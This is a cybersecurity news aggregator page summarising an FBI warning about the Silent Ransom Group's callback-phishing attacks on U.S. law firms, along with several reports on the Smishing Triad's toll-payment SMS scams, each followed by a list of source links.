CyberSecurity news

FlagThis - #phishingscam

Pierluigi Paganini@Security Affairs //

FBI Warns Law Firms of Stealth Phishing Attacks - The FBI warns law firms about the Silent Ransom Group (Luna Moth), which uses IT-themed social engineering and phishing tactics to steal data for extortion.
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.

SRG's methods include IT-themed social engineering calls and callback phishing emails. In these attacks, they impersonate IT personnel to deceive employees into granting remote access to systems. They may direct the employee to a malicious website or send a link via email that installs remote access software. Once inside, the attackers discreetly extract sensitive files using tools like WinSCP or disguised versions of Rclone. This campaign is particularly dangerous because it leaves minimal digital traces and can bypass traditional security measures.

To defend against these attacks, the FBI urges law firms to enhance staff training to recognize and avoid social engineering tactics. Implementing multi-factor authentication is crucial, as is proactive monitoring for unauthorized access attempts. The agency also advises that victims share any ransom evidence with law enforcement to aid in investigations. Furthermore, CISOs are encouraged to fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy.

Recommended read:
References :
  • DataBreaches.Net: DataBreaches.net issues a Private Industry Notification about the Silent Ransom Group targeting law firms.
  • securityaffairs.com: SecurityAffairs reports on Silent Ransom Group targeting law firms, the FBI warns.
  • The DefendOps Diaries: The DefendOps Diaries explores the Silent Ransom Group's new era of cyber extortion.
  • bsky.app: The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
  • BleepingComputer: FBI warns of Luna Moth extortion attacks targeting law firms
  • ciso2ciso.com: Silent Ransom Group targeting law firms, the FBI warns – Source: securityaffairs.com
  • hackread.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls
  • databreaches.net: Private Industry Notification: Silent Ransom Group Targeting Law Firms
  • Security Affairs: The FBI warns that the Silent Ransom Group, active since 2022 and also known as Luna Moth, has targeted U.S. law firms using phishing and social engineering. Linked to BazarCall campaigns, the group previously […]
  • ciso2ciso.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls – Source:hackread.com
  • malware.news: Private Industry Notification: Silent Ransom Group Targeting Law Firms
  • ciso2ciso.com: FBI warns law firms: Silent Ransom Group uses phishing emails and fake IT calls to steal data, demanding ransom to prevent public leaks.
  • gbhackers.com: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
  • malware.news: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
  • The Hacker News: The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims
  • gbhackers.com: The Federal Bureau of Investigation (FBI) has issued a critical alert regarding the escalating activities of the cyber threat actor known as Silent Ransom Group (SRG), also identified under aliases such as Luna Moth, Chatty Spider, and UNC3753.
  • Tech Monitor: The FBI alerts law firms to rising threat of Silent Ransom Group’s extortion tactics
  • thecyberexpress.com: FBI Warns about Silent Ransom Group Targeting Law Firms
  • eSecurity Planet: The FBI warns law firms of a stealth phishing scam where hackers call victims, pose as IT staff, and use remote access tools to steal sensitive data.
  • www.scworld.com: US law firms facing Luna Moth ransomware threat
  • cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
  • www.esecurityplanet.com: FBI Warns Law Firms: Hackers Are Calling Offices in Stealth Phishing Scam
  • cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
  • www.techradar.com: FBI warns legal firms of Luna Moth extortion attacks where hackers will call their office
Stu Sjouwerman@blog.knowbe4.com //

Smishing Attacks Target US Toll Payment Services and Users - US Tolling agencies are facing deceptive text message scams (smishing) that impersonate toll payment notifications, leading to unauthorized payments.
Tolling agencies throughout the United States are currently grappling with an escalating cybersecurity threat: deceptive text message scams known as smishing. These scams involve cybercriminals sending text messages that impersonate toll payment notifications, tricking individuals into clicking malicious links and making unauthorized payments. These messages often embed links that, if clicked, take the victim to a phishing site impersonating E-ZPass, The Toll Roads, FasTrak, Florida Turnpike, or another toll authority.

These scams are part of a sophisticated campaign leveraging platforms, most recently a PhaaS platform called Lucid. This platform enables cybercriminals to launch large-scale phishing campaigns with minimal effort. Cybercriminals behind this scheme are exploiting legitimate communication technologies like Apple iMessage and Android RCS to bypass traditional spam filters and deliver their malicious messages at scale.

The phishing messages typically claim unpaid toll fees and threaten fines or license suspension if recipients fail to respond. The Lucid platform offers advanced features such as dynamic targeting, device-specific focus, and evasion techniques. These features allow attackers to tailor campaigns for iOS or Android users, block connections from non-targeted regions, and prevent direct access to phishing domains.

Recommended read:
References :
  • aboutdfir.com: Have you ever received an odd text message on your phone, purporting to be from a toll provider or package delivery service? If you have a U.S. cell phone, chances are you’ve encountered one of these SMiShing attempts—cybercriminals’ latest ploy to trick you into giving up your personal
  • www.cysecurity.news: Tolling agencies throughout the United States are battling an escalating cybersecurity threat that is causing deceptive text message scams, which are often called smishing, to escalate.
  • Cyber Security News: Beware! Phishing Scam Uses Fake Unpaid Tolls Messages to Harvest Login Credentials
  • gbhackers.com: Beware! Fake Unpaid Tolls Messages Used in Phishing Attack to Steal Login Credentials
  • www.bleepingcomputer.com: E-ZPass toll payment texts return in massive phishing wave
  • BleepingComputer: An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information.
  • The DefendOps Diaries: The Toll Payment Text Scam: A Modern Cybersecurity Threat
  • blog.knowbe4.com: Upgraded Phishing-as-a-Service Platform Drives a Wave of Smishing Attacks
  • cybersecuritynews.com: A sophisticated cybercriminal operation has emerged targeting toll payment services across multiple regions, with evidence suggesting this campaign will continue expanding globally.
  • Cyber Security News: Toll Payment Services Abused in Large-Scale Hacking Campaign
  • gbhackers.com: Threat Actors Exploit Toll Payment Services in Widespread Hacking Campaign
  • securityonline.info: Resecurity report details escalation of smishing by China-based Smishing Triad targeting toll payments in US and UK.
  • securityonline.info: Smishing Triad Expands Fraud Campaign, Targets Toll Payment Services
  • www.scworld.com: Toll payment service-targeted schemes by Smishing Triad escalates
  • Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
  • krebsonsecurity.com: China-based SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad†mainly impersonated toll road operators and shipping companies.
  • www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing†campaigns.
  • bsky.app: SilentPush has published a profile of Chinese cybercrime group Smishing Triad. The group is massive, with operations across 121 countries. The report also looks at the group's new phishing kit, named Lighthouse.
  • gbhackers.com: Chinese eCrime Group Targets Users in 120+ Countries to Steal Banking Credentials
  • www.silentpush.com: Smishing Triad: Chinese eCrime Group Targets 121+ Countries, Intros New Banking Phishing Kit
  • blog.talosintelligence.com: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
  • Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
  • cyberpress.org: “$5 SMS Scam Alert: Toll Road Users Targeted in New Phishing Campaignâ€
  • Daily CyberSecurity: Nationwide Smishing Scam Targets Toll Road Users, Stealing Payment Data
  • Cyber Security News: Cisco Talos has uncovered an ongoing financial theft campaign targeting toll road users across the United States through SMS phishing, or “smishing,†attacks. This campaign, active since October 2024, impersonates toll payment services to steal sensitive user information.
  • gbhackers.com: Cybersecurity researchers at Cisco Talos have uncovered a large-scale smishing campaign targeting toll road users across the United States.
Stu Sjouwerman@blog.knowbe4.com //

Chinese Smishing Triad Targets Toll Road Users - The Smishing Triad, a China-based eCrime group, is conducting SMS phishing campaigns targeting toll road users in the United States to steal financial information.
Cisco Talos has uncovered an extensive and ongoing SMS phishing campaign that began in October 2024, targeting toll road users across the United States. The "Smishing Triad," a China-based eCrime group, is suspected to be behind these attacks, impersonating E-ZPass and other U.S. toll agencies to steal financial information. Victims receive fraudulent text messages claiming they have an outstanding toll bill, typically under $5, and are urged to pay immediately to avoid late fees. These messages prompt users to click on a link that leads to a spoofed domain mimicking the legitimate toll service's website.

Once on the fake webpage, victims are asked to solve a CAPTCHA before being directed to a fraudulent bill displaying their name and the supposed amount owed. Upon clicking "Proceed Now," users are prompted to enter personal information, including their name, address, phone number, and credit card details, which are then stolen by the threat actors. Talos assesses with moderate confidence that multiple financially motivated threat actors are involved, utilizing a smishing kit developed by "Wang Duo Yu." The actors have targeted individuals in at least eight states, including Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas, identified through spoofed domains containing the states' two-letter abbreviations.

The Smishing Triad, known for systematically targeting organizations in at least 121 countries across various industries, has shown remarkable success in converting phished payment card data into mobile wallets from Apple and Google. Silent Push analysts have found that the group's infrastructure generated over one million page visits in just 20 days, suggesting a potentially higher volume of SMS messages sent than previously estimated. The group continues to sell its phishing kits via Telegram and other channels. Authorities, including the FBI's IC3, have been aware of similar scams since at least April 2024, highlighting the persistent and evolving nature of these phishing campaigns.

Recommended read:
References :
  • Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
  • Blog: A recent smishing campaign is impersonating E-ZPass and other U.S.-based toll agencies and sending fraudulent text messages to individuals. These messages claim that recipients have unpaid tolls and urge immediate payment to avoid penalties or suspension of driving privileges.
  • Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
  • krebsonsecurity.com: China-based SMS phishing Triad Pivots to Banks
  • www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing†campaigns.
Stu Sjouwerman@blog.knowbe4.com //

Toll Payment Services Exploited in Smishing Campaign - A China-based cybercriminal group, the Smishing Triad, is targeting US and UK consumers with smishing campaigns exploiting toll payment services, using deceptive messages to steal personal and financial data.
A China-based cybercriminal group known as the Smishing Triad is behind a surge in smishing campaigns targeting consumers in the US and UK. The group is exploiting toll payment services by sending fraudulent text messages that appear to originate from legitimate toll collection agencies such as FasTrak, E-ZPass, and I-Pass. These deceptive messages claim unpaid toll bills or payment requests, tricking users into divulging sensitive personal and financial information. Tolling agencies throughout the United States are battling this escalating cybersecurity threat, highlighting the need for heightened vigilance.

These campaigns utilize tactics that make it difficult for consumers to protect themselves, primarily by spoofing Sender IDs (SIDs) via SMS, iMessage, and other instant messaging (IM) platforms. The attackers impersonate legitimate organizations, creating a sense of urgency to prompt immediate action from the recipients. The lower spam protection of SMS compared to email makes these IM channels a fertile ground for exploitation, leading to a higher likelihood of victims falling for the scam. The attackers’ objectives include financial gain and the theft of personal and financial data for future exploitation.

The scale of the campaign is significant, with the use of over 60,000 impersonation websites, complicating efforts by platforms like Apple and Android to block these fraudulent activities effectively. These fraudulent websites mimic official toll payment portals, tricking users into entering payment details or personal information, which is then harvested for financial fraud and identity theft. Federal and state agencies have issued warnings, advising individuals to verify toll-related claims through official websites and avoid clicking on links in unsolicited text messages. Consumers are also advised to report suspicious messages to authorities and enable security features on smartphones.

Recommended read:
References :
  • www.cysecurity.news: Tolling agencies throughout the United States are battling an escalating cybersecurity threat that is causing deceptive text message scams, which are often called smishing, to escalate.
  • BleepingComputer: Toll payment text scam returns in massive phishing wave
  • gbhackers.com: Beware! Fake Unpaid Tolls Messages Used in Phishing Attack to Steal Login Credentials
  • www.bleepingcomputer.com: The E-ZPass toll payment texts return in massive phishing wave
  • Cyber Security News: Beware! Phishing Scam Uses Fake Unpaid Tolls Messages to Harvest Login Credentials
  • The DefendOps Diaries: The Toll Payment Text Scam: A Modern Cybersecurity Threat
  • www.bleepingcomputer.com: An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information.
  • gbhackers.com: Threat Actors Exploit Toll Payment Services in Widespread Hacking Campaign
  • securityonline.info: Smishing campaigns exploiting toll payment systems to deceive consumers into disclosing sensitive information, often linked to popular platforms like FasTrak, E-ZPass, and I-Pass.
  • Cyber Security News: In a sophisticated cybercrime operation, the Smishing Triad, a China-based group, has been identified as the orchestrator behind a surge in smishing campaigns targeting consumers in the US and UK.
  • blog.knowbe4.com: Upgraded Phishing-as-a-Service Platform Drives a Wave of Smishing Attacks
  • cybersecuritynews.com: Threat Actors Leveraging Toll Payment Services in Massive Hacking Attack
  • securityonline.info: Smishing Triad Expands Fraud Campaign, Targets Toll Payment Services
  • www.scworld.com: Toll payment service-targeted schemes by Smishing Triad escalates
  • blog.talosintelligence.com: Unraveling the U.S. toll road smishing scams
  • DataBreaches.Net: E-ZPass toll payment texts return in massive phishing wave
  • Blog: Unpaid toll-themed smishing campaign gives victims no free ‘E-ZPass’
  • Cisco Talos: Have you received a suspicious text that seemed to be from a toll road service? Discover how this widespread smishing scam is targeting U.S. drivers and uncover the actors behind it in our latest blog post:
  • Cisco Talos Blog: Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America.
  • krebsonsecurity.com: China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies.
  • www.silentpush.com: Smishing Triad: Chinese eCrime Group Targets 121+ Countries, Intros New Banking Phishing Kit
  • bsky.app: SilentPush has published a profile of Chinese cybercrime group Smishing Triad. The group is massive, with operations across 121 countries. The report also looks at the group's new phishing kit, named Lighthouse.
  • gbhackers.com: Smishing Triad has targeted numerous countries, including but not limited to UK, Canada, and USA.
  • www.silentpush.com: Smishing Triad is a Chinese eCrime group systematically targeting organizations in at least 121 countries with SMS phishing “smishing” campaigns.

Posts

Blogs

Research Tools